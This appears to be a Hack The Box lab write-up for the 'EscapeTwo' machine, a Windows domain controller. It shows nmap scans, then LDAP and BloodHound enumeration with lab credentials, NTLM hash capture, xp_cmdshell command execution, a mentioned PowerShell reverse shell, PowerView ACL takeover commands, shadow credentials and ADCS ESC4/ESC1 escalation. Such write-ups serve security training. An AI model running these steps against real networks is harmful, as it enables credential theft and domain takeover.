┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -F -Pn $ip -oN Nmap/fast-scan
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/10000-port-scan
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-13 20:09:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ms-sql-ntlm-info:
| 10.10.11.51:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-13T19:33:09
|_Not valid after: 2055-01-13T19:33:09
| ms-sql-info:
| 10.10.11.51:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Summary
* Open ports: 53-88-135-139-389-445-464-593-636-1433-3268-3269-5985
* UDP open ports:
* Services: DNS - KERBEROS - LDAP - SMB - MSSQL - winRM - LDAPS
* Important notes: Domain: sequel.htb - DNS:DC01.sequel.htb - Microsoft SQL Server 2019
I tried to steal NTLMv2 credentials using xp_dirtree function with SMBServer running on my attacking machine, Then I got the hash but couldn't crack it, So I decided to look for different things.
I moved then to dump LDAP data and begin to enumerate the domain with bloodhound.py
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $ldapdomaindump ldap://$ip -u "sequel.htb\rose" -p 'KxEPkKe6R8su'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $bloodhound-python -u rose -p KxEPkKe6R8su -ns $ip -d sequel.htb -c all --zip
INFO: Found AD domain: sequel.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 10 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 1 ous
Also, I tried to get kerberoastable accounts, and I got two of them, but I couldn't crack their hashes, either.
It's worth nothing to Check for ADCS existence as it opens many avenues of we to find any misconfiguration associated with the templates
I looked for SMB shares using my credentials and found I have access to two shared folders:
InAccounting Department, there is account.xlsx file. First, I tried to open it with Microsoft Excel or any xlsx viewer but it said the file is corrupted.
Since xlsx can be treated as zip file, I unzipped it and began to look for any interesting info.
Using sa account, I can log in to the MSSQL instance as an admin
Impacket version v0.12.0 has built-in commands to automate some attacks, I will use enable_xp_cmdshell
SQL (sa dbo@master)> enable_xp_cmdshell
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> xp_cmdshell whoami
output
--------------
sequel\sql_svc
I will host PowerShell reverse shell on my web server and download it to the machine
With these privileges, I will Add Ownership to Ryan, then give him fullcontrol and after that, I can perform Shadow Credentials, Reset Password or targeted Kerberosasting
Get-DomainObjectAcl -ResolveGUIDs -SecurityIdentifier S-1-5-21-548670397-972687484-3496335370-1114
Set-DomainObjectOwner -TargetIdentity ca_svc -PrincipalIdentity ryan
Add-DomainObjectAcl -TargetIdentity ca_svc -PrincipalIdentity ryan -Rights fullcontrol
Get NT hash of ca_svc using shadow credential attack
With ca_svc hash, I can authenticate to the domain and begin to enumerate ADCS
So, there is a template vulnerable to ESC4. That means I have permission to change the attribute associated with that template and make it vulnerable to ESC1
ESC1 is an escalation of misconfigured template is allowed to supply subject alternative name and can be abused to add any user of the domain (Administrator) to the template and get certificate for them.
